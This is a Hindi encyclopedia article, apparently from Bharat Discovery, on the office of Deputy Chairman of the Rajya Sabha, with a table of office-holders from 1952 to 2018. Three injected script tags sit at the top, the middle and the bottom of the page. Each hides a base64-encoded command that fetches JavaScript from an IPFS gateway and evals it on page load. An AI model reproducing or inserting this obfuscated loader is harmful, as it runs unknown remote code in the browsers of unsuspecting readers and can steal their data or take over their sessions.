राज्य सभा के उपसभापति  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

राज्य सभा के उपसभापति (अंग्रेज़ी: Deputy Chairman of the Rajya Sabha) राज्य सभा के सभापति के अभाव में राज्य सभा की कार्रवाई की अध्यक्षता करते हैं। भारत के उपराष्ट्रपति ही राज्य सभा के सभापति होते हैं। राज्य सभा के उपसभापति राज्य सभा द्वारा आंतरिक रूप से चुने जाते हैं। वर्तमान में राज्य सभा के उपसभापति हरिवंश नारायण सिंह हैं।

यहाँ यह तथ्य विशेष रूप से उल्लेखनीय है कि- भारतीय संविधान के अनुसार लोक सभा की तरह राज्य सभा का भी एक प्रमुख होता है, किन्तु उसे राज्य सभा अध्यक्ष की बजाय सभापति कहा जाता है। सदन की कार्य प्रणाली का नियंत्रक वही होता है। भारत का उपराष्ट्रपति राज्य सभा का पदेन सभापति होता है।

उपसभापति

भारत में संसदीय प्रणाली के अंतर्गत नियुक्त किये गए राज्य सभा के उपसभापतियों के नाम व कार्यकाल निम्न प्रकार हैं-

क्रमांक नाम कार्यकाल दल / पार्टी चित्र
1. एस. वी. कृष्णमूर्ति राव 31 मई, 1952-2 अप्रॅल 1956 भारतीय राष्ट्रीय कांग्रेस
(1.) एस. वी. कृष्णमूर्ति राव 25 अप्रॅल 1956-1 मार्च 1962 भारतीय राष्ट्रीय कांग्रेस
2. वायलेट अल्वा 19 अप्रॅल 1962-2 अप्रॅल 1966 भारतीय राष्ट्रीय कांग्रेस
(2.) वायलेट अल्वा 7 अप्रॅल 1966-16 नवंबर 1969 भारतीय राष्ट्रीय कांग्रेस
3. भाऊराव देवाजी खोब्रागडे 17 दिसंबर 1969-2 अप्रॅल 1972 भारतीय रिपब्लिकन पार्टी
4. गोदे मुरहारी 4 अप्रॅल 1972-2 अप्रॅल 1974 संयुक्त समाजवादी दल
(4.) गोदे मुरहारी 26 अप्रॅल 1974-20 मार्च 1977 संयुक्त समाजवादी दल
5. राम निवास मिर्धा 30 मार्च 1977-4 अप्रॅल 1980 भारतीय राष्ट्रीय कांग्रेस
6. श्‍याम लाल यादव 30 जुलाई 1980-4 अप्रॅल 1982 भारतीय राष्ट्रीय कांग्रेस
(6.) श्‍याम लाल यादव 28 अप्रॅल 1982-29 दिसंबर 1984 भारतीय राष्ट्रीय कांग्रेस
7. नजमा हेपतुल्ला 25 जनवरी 1985-20 जनवरी 1986 भारतीय राष्ट्रीय कांग्रेस
8. एम. एम. जेकब 2 फ़रवरी 1986-22 अक्टूबर 1986 भारतीय राष्ट्रीय कांग्रेस
9. प्रतिभा देवीसिंह पाटिल 18 नवंबर 1986-5 नवंबर 1988 भारतीय राष्ट्रीय कांग्रेस
(7.) नजमा हेपतुल्ला 11 नवंबर 1988-4 जुलाई 1992 भारतीय राष्ट्रीय कांग्रेस
(7.) नजमा हेपतुल्ला 10 जुलाई 1992-4 जुलाई 1998 भारतीय राष्ट्रीय कांग्रेस
(7.) नजमा हेपतुल्ला 9 जुलाई 1998-10 जून 2004 भारतीय राष्ट्रीय कांग्रेस
10. के. रहमान ख़ान 22 जुलाई 2004-2 अप्रॅल 2006 भारतीय राष्ट्रीय कांग्रेस
(10.) के. रहमान ख़ान 12 मई, 2006-2 अप्रॅल 2012 भारतीय राष्ट्रीय कांग्रेस
11. पी. जे. कुरियन 21 अगस्त 2012-1 जुलाई 2018 भारतीय राष्ट्रीय कांग्रेस
12. हरिवंश नारायण सिंह 9 अगस्त 2018 से पदस्थ जनता दल (यूनाइटेड)


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=राज्य_सभा_के_उपसभापति&oldid=657476" से लिया गया